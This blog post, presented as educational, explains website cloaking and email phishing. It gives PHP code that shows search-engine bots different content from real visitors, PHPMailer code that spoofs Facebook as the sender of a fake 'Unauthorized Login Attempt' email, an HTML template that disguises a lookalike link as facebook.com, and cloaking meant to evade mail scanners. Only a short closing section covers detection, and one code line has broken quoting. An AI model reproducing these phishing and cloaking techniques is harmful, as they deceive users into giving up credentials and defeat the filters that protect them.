Share This:

If you like my work show support on my Patreon

Visual Diagram To Explain Cloaking
cloaking explained

Disclaimer: I’m not responsible for any actions you do by using the information provided in this article. It is strictly for educational purposes.

Cloaking is a tactic used in black hat communities to trick people or even other websites into thinking the content on their site is something different then it is.

There are several reasons why someone may want to cloak a website. However most of the reasons are simply for personal gain, by deceiving other people or programs.

It is worth noting that this is a very gray topic, that isn’t considered legal or illegal. It is debated often and policies by third party sites differ on the subject. Some sites support such methods others frown upon it.

Scenario 1

A person has several websites. One website is doing very well in Google. But other sites are doing very poorly. The other site may be doing poorly because of competition. Which makes it hard to compete. The person then comes up with an idea.

The person who is selling beauty products and has a website that is doing well selling the beauty products because the name of the site is beautyproducts.com can get other sites that aren’t doing well to do just as well.

Lets say the persons poorest preforming site is gobbledygook.com and the search query on google for gobbledy gook only has 436,000 search results. Which is a lot less competition then the search term beauty products 216,000,000 search results. So what can be done is we can increase our beauty products website revenue by taking advantage of the lack of competition that gobbledy gook has.

This search displays 216,000,000 results making competition more difficultThis search displays 436,000 results making competition easier
beautygobbledy-gook

The most basic way of doing this would be doing a 301 redirect.

<meta http-equiv="refresh" content="0;URL=http://www.beautyproducts.com" />

However this method is so commonly used many sites ban sites that use the above code. And google doesn’t index sites that have the above code. So what can we do?

Well we know that one of the spiders that Google uses to index websites is called Googlebot. So we can identify the User Agent string of Googlebot which is googlebot and make the site display legitimet content for google to index.

We might make the site say something like the following.

Gobbledy Gook is so delicious I eat it with every meal. It taste so good and here is a great Gobbledy Gook recipe for you. So on and so on.

Now we put that site into some user agent identifier code written in PHP.

if (strpos($_SERVER['HTTP_USER_AGENT'],"Googlebot"))
{
echo "Gobbledy Gook is so delicious I eat it with every meal. It taste so good and here is a great Gobbledy Gook recipe for you. So on and so on.";
}

Now Google thinks the site is legitimate and will index it normally. But lets add to the code so regular users will get redirected.


if (strpos($_SERVER['HTTP_USER_AGENT'],"Googlebot"))
{
echo "Gobbledy Gook is so delicious I eat it with every meal. It taste so good and here is a great Gobbledy Gook recipe for you. So on and so on.";
}
else
{
echo "<meta http-equiv="refresh" content="0;URL=http://www.beautyproducts.com" />";
}

Real World Example
Real World Example

Now it is important to understand this method will work on smaller search engines. But major search engines have grown wise to such tactics. And take proper measures to prevent this. But this is just a basic concept of how cloaking works.

Scenario 2

Your running a massive E-Mail blasting campaign and blasting your website out to thousands of E-Mails. But you notice people aren’t as interested in the site and aren’t clicking on the link you provide them with. Maybe they have grown wise and don’t trust links you send.

You can use three methods and combine them to be able to get people to click the links you send them.

  1. Spoof The E-Mail
  2. Spoof The Link
  3. Cloak The URL

Spoof The E-Mail

To spoof the E-Mail so it appears to be coming from some place like Facebook we will simply put PHPMailer on our server. Then we will use the SendMail feature in the PHPMailer package.

require '../PHPMailerAutoload.php';
$mail = new PHPMailer;
$mail->isSendmail();
//Set who the message is to be sent from
$mail->setFrom([email protected]', 'Facebook');
//Set who the message is to be sent to
$mail->addAddress([email protected]', 'John Doe');
$mail->Subject = 'Unauthorized Login Attempt';
//Read an HTML message body from an external file, convert referenced images to embedded,
//convert HTML into a basic plain-text alternative body
$mail->msgHTML(file_get_contents('spoof-fbmsg.html'), dirname(__FILE__));
//Replace the plain text body with one created manually
$mail->AltBody = 'Dear facebook user we noticed a suspicious login from an IP address located in China. Please go to the following link http://fbsafety.com';
//Attach an image file
$mail->addAttachment('images/facebook-logo.png');
$mail->send();

The above code will send an E-Mail to a Gmail account that appears to be coming from facebook. The setFrom tells he users E-Mail to display the from address as [email protected] even though facebook isn’t sending the message, it makes the incoming mail server think it is.

addAddress is the person the message would be sent to. In a real world example you would probably have a list of E-Mail addresses in a database and use a for loop to loop threw all the email addresses and send the same message to all E-Mails in the database.

The Subject should be self explanitory. It is the subject of the E-Mail.

Now msgHTML needs a bit of explaining. E-Mails can display graphically if they are set to do so. If they display graphically then HTML code in the E-Mail displays the same way it would be displayed on a website. So when you get those pretty E-Mails with images and banners and everything that is all HTML. And the msgHTML we can use to make a near replica of a facebook E-Mail.

AltBody is used if the E-Mail can’t accept HTML content. This will remove all graphics from the E-Mail. This includes href html links. So we need to just provide a full URL that we own but looks like it belongs to someone else. In this example I used http://fbsafety.com which will be displayed to the user just like that. We can use the same address in the HTML version but make it look a bit more official. That will be explained next when we cloak the Link.

Cloaking The Link

If we look at the above sendmail.php example code. We will notice we have a file called spoof-fbmsg.html. Lets examine what may be in this file.

<html>
<head>
<title>Facebook Security</title>
</head>
<body>
<div style="color: #0000ff; width: 100%;">
<img src="facebook-logo.png" />
</div>
<p>Dear facebook user we noticed a suspicious login from an IP address located in China. Please go to the following link <a href="http://fbsafety.com">http://www.facebook.com/password-change.php</a></p>
</body>
</html>

Notice the part in the red? The http://fbsafety.com is where the user will get directed to when he/she clicks the link. But the user sees http://www.facebook.com/password-change.php so the user is tricked into thinking they are really clicking on a real facebook link.

The part in blue could be an image that has a malicious program binded to it. I spoke about file binding in another post.

URL Cloaking

If the URL we are using is new, then their wont be any problems. However if the attacker wants to make sure that the URL is always good to use and doesn’t want to risk it from being black listed. He/She will add cloaking to the URL.


if (strpos($_SERVER['HTTP_USER_AGENT'],"emailbot") || strpos($_SERVER['HTTP_REFERER'],"google.com/_/scs/mail-static/")
{
echo "Yes I'm very legit Google I'm only deceiving you while victimizing everyone else.";
}
else
{
echo "Some content I want to provide to the user.";
}

As you can see the code above is similar to the cloaking code we made earlier. And it can be more complex as well.

Prevention

Many well established sites have done many things to prevent cloaking to provide a safer environment to their users. It is important to note that on the black market their are companies that provide cloaking services that are so advanced that they can even trick well established sites like Google.



However lets assume this a is a small scale operation. And lets assume you accept website submission from users. So the users can get backlinks from your site. And lets assume you don’t have time to manually check every link, so you use a bot to add the links to the site.

One of the 1000’s of methods Google uses to check such sites is simply using bots with user agent strings that look like web browser user agent strings.

So Google will have several bots. It’s famous Googlebot then it may have another bot that looks like Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0 which is the 64bit Linux Version of Firefox user agent string. It then scrapes the content using both bots and compares them. If the contents change considerably it flags the site for further review.

If your a user who is receiving such an E-Mail you can hover over links. Browsers will show the URL it will be going to in the lower left hand corner of the web browser.

More advanced users may want to right click the link copy the link location and use wget to fetch the page in question.

wget http://fbsafety.com

After fetching the page. You can open it up in your preferred text editor and view the source code. Alternatively if your using Firefox, right click the link choose copy link location, then open up a new tab and type view-source: in the address bar and then paste the link directly after that and press enter.

view-source:http://fbsafety.com

If you like my work show support on my Patreon